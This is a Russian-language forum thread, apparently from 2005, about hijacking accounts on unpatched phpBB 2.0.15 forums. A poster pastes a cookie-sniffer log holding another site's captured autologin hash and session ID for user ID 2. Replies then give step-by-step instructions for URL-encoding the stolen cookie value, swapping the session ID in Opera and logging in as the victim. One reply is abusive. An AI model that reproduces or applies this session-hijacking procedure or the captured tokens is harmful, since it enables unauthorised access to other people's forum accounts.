(насчет взлома phpbb 2.0.15) На мой вопрос я получил ответ - "а ты не думал, что эту дырку могли закрыть?" ТАк вот - в в пропатченой версии (2.0.16) кукисы вообще не посылаются на сниффер, а если они посылаются на каком либо форуме N - значит форум N не пропатчен. 1 Это так? 2 Если мне все-таки удалось получить кукисы с форума N значит я могу зайти в этот форум под другим пользователем? (просто я не могу понять в чем ошибка ИЛИ форумы попадаются пропатченые ИЛИ неправильно меняю кукисы)
менял и через Оперу и через CookiesEditor и IE CookiesView. подробнее о трабле - /threadnav8021-2-10.html (я даж видео снял). (Ответь пожалуста на вопросы, которые выше)
Ну после того как зарегился оставил сообщение на форуме иду на сниффер и получаю там такую бурду [Sun Jul 17 18:44:42 2005] IP=212.23.64.155 SITE=www.NNN.ru REFERER=http://www.NNN.ru/forum/privmsg.php?folder=inbox&mode=read&p=621 QUERY=b=b; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"4535fce50ee88417b1d00ce1dd1e2f90";s:6:"userid";i:2;}; phpbb2mysql_sid=1456e494fd33ff9f2461c1c84e0305c6; hotlog=1; phpbb2mysql_t=a:5:{i:50;i:1121609412;i:329;i:1121610582;i:391;i:1121609815;i:525;i:1121611469;i:350;i:1121610913;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"4535fce50ee88417b1d00ce1dd1e2f90";s:6:"userid";i:2;}; phpbb2mysql_sid=1456e494fd33ff9f2461c1c84e0305c6; b=b; hotlog=1 AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Далее (например в Опере) захожу снова на форум -> жму tools=>advanced=>cookies... ->выбираю там нужный сайт, а там две строки phpbb2mysql_data и phpbb2mysql_sid -> удаляю phpbb2mysql_sid, а phpbb2mysql_data меняю (если рассматривать именно этот пример) на a:2:{s:11:"autologinid";s:32:"4535fce50ee88417b1d00ce1dd1e2f90";s:6:"userid";i:2;}; -> закрываю юраузер, потом захожу на www.NNN.ru/forum/index.php? НО ничерта не получается! Ссылка вместо Выход[-artik-] становится просто Вход
Брань и оскорбления в рот, а кто сказал что строка a:2:{s:11:"autologinid";s:32:"4535fce50ee88417b1d00ce1dd1e2f90";s:6:"userid";i:2;};, прямо для того чтобы ее в оперу втыкать? ИДИОТ! Короче, надо http://webmastertools.narod.ru/OnlineTools/url_decode.html вот этим декодером кодировать твою херь, получица вот такая:a:2:%7Bs:11:%22autologinid%22;s:32:%224535fce50ee88417b1d00ce1dd1e2f90%22;s:6:%22userid%22;i:2;%7D; херь, вот ее и нада фтыкать, лол! АФФТАР ВЫПЕЙ ЙАДУ!
Да, правильно WizART написал. phpbb2mysql_data надо кодировать декодером; phpbb2mysql_sid подставить новый. И подставить в Оперу... Странно, что у Задохлика в видео все получилось.